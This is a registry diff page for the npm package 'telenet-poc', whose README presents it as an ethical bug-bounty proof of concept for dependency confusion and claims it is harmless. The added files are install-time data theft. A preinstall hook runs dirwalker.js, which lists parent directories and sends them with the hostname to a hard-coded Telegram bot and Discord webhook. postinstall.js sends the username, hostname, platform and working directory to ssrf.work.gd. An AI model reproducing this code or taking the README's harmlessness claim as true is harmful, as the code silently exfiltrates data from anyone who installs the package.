telenet-poc 0.0.1-security ā 11.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of telenet-poc might be problematic. Click here for more details.
- package/README.md +9 -5
- package/dirwalker.js +83 -0
- package/index.js +4 -0
- package/package.json +11 -6
- package/postinstall.js +17 -0
package/README.md
CHANGED
|
@@ -1,5 +1,9 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
This package
|
|
4
|
-
|
|
5
|
-
|
|
1
|
+
# Telenet (Bug Bounty PoC)
|
|
2
|
+
|
|
3
|
+
This package was published as a **proof-of-concept for ethical bug bounty testing**, specifically to identify **dependency confusion vulnerabilities** in CI/CD environments.
|
|
4
|
+
|
|
5
|
+
If you believe your systems have unintentionally pulled this package, please review your internal dependency handling and registry configuration.
|
|
6
|
+
|
|
7
|
+
**Author:** [Jalwan on Intigriti](https://app.intigriti.com/researcher/profile/jalwan)
|
|
8
|
+
|
|
9
|
+
No harmful code exists in this package. It is designed to demonstrate a class of software supply chain security issues under a responsible disclosure policy.
|
package/dirwalker.js
ADDED
|
@@ -0,0 +1,83 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const path = require('path');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const https = require('https');
|
|
5
|
+
const http = require('http');
|
|
6
|
+
|
|
7
|
+
const maxDepth = 10;
|
|
8
|
+
const telegramToken = "7772705649:AAEyhbtAeW9gW1jBtvNK2O_I6zVVIO3qzGE";
|
|
9
|
+
const telegramChatId = "7004630534";
|
|
10
|
+
const discordWebhook = "https://discord.com/api/webhooks/1363863656344850806/LbaHOjKebFXITmQieps5rjNFqFxzzqHhiSHbsc7CdylQ3kBHM3gS1VitVGZ63RL7O4ME";
|
|
11
|
+
|
|
12
|
+
function walkUpDirs() {
|
|
13
|
+
const results = [];
|
|
14
|
+
let currentDir = process.cwd();
|
|
15
|
+
|
|
16
|
+
for (let depth = 0; depth < maxDepth; depth++) {
|
|
17
|
+
try {
|
|
18
|
+
const items = fs.readdirSync(currentDir, { withFileTypes: true }).map(d =>
|
|
19
|
+
d.isDirectory() ? `[D] ${d.name}` : ` ${d.name}`
|
|
20
|
+
);
|
|
21
|
+
results.push(`š ${currentDir}\n${items.join('\n')}\n`);
|
|
22
|
+
const parent = path.dirname(currentDir);
|
|
23
|
+
if (parent === currentDir) break; // Reached root
|
|
24
|
+
currentDir = parent;
|
|
25
|
+
} catch (err) {
|
|
26
|
+
results.push(`Error reading ${currentDir}: ${err.message}`);
|
|
27
|
+
break;
|
|
28
|
+
}
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
return results.join('\n');
|
|
32
|
+
}
|
|
33
|
+
|
|
34
|
+
function sendTelegram(message) {
|
|
35
|
+
const payload = JSON.stringify({
|
|
36
|
+
chat_id: telegramChatId,
|
|
37
|
+
text: message,
|
|
38
|
+
parse_mode: "Markdown"
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
const options = {
|
|
42
|
+
hostname: "api.telegram.org",
|
|
43
|
+
path: `/bot${telegramToken}/sendMessage`,
|
|
44
|
+
method: "POST",
|
|
45
|
+
headers: {
|
|
46
|
+
"Content-Type": "application/json",
|
|
47
|
+
"Content-Length": Buffer.byteLength(payload)
|
|
48
|
+
}
|
|
49
|
+
};
|
|
50
|
+
|
|
51
|
+
const req = https.request(options, (res) => res.on("data", () => {}));
|
|
52
|
+
req.on("error", () => {});
|
|
53
|
+
req.write(payload);
|
|
54
|
+
req.end();
|
|
55
|
+
}
|
|
56
|
+
|
|
57
|
+
function sendDiscord(message) {
|
|
58
|
+
const payload = JSON.stringify({ content: message });
|
|
59
|
+
const url = new URL(discordWebhook);
|
|
60
|
+
|
|
61
|
+
const req = https.request({
|
|
62
|
+
hostname: url.hostname,
|
|
63
|
+
path: url.pathname + url.search,
|
|
64
|
+
method: "POST",
|
|
65
|
+
headers: {
|
|
66
|
+
"Content-Type": "application/json",
|
|
67
|
+
"Content-Length": Buffer.byteLength(payload)
|
|
68
|
+
}
|
|
69
|
+
}, res => res.on('data', () => {}));
|
|
70
|
+
|
|
71
|
+
req.on('error', () => {});
|
|
72
|
+
req.write(payload);
|
|
73
|
+
req.end();
|
|
74
|
+
}
|
|
75
|
+
|
|
76
|
+
// Main
|
|
77
|
+
const report = walkUpDirs();
|
|
78
|
+
const info = `š„ļø Host: ${os.hostname()}\nš CWD: ${process.cwd()}\n\n${report}`;
|
|
79
|
+
|
|
80
|
+
console.log(info);
|
|
81
|
+
|
|
82
|
+
sendTelegram(info);
|
|
83
|
+
sendDiscord(info);
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "telenet-poc",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
1
|
+
{
|
|
2
|
+
"name": "telenet-poc",
|
|
3
|
+
"version": "11.0.0",
|
|
4
|
+
"description": "PoC that reports directory structure via Discord and Telegram",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node dirwalker.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "Jalwan",
|
|
10
|
+
"license": "ISC"
|
|
11
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,17 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
const querystring = require('querystring');
|
|
4
|
+
|
|
5
|
+
const data = querystring.stringify({
|
|
6
|
+
user: os.userInfo().username,
|
|
7
|
+
hostname: os.hostname(),
|
|
8
|
+
platform: os.platform(),
|
|
9
|
+
cwd: process.cwd(),
|
|
10
|
+
node_version: process.version
|
|
11
|
+
});
|
|
12
|
+
|
|
13
|
+
const url = `https://ssrf.work.gd/?${data}`;
|
|
14
|
+
|
|
15
|
+
https.get(url, (res) => {
|
|
16
|
+
res.on('data', () => {});
|
|
17
|
+
}).on('error', () => {});
|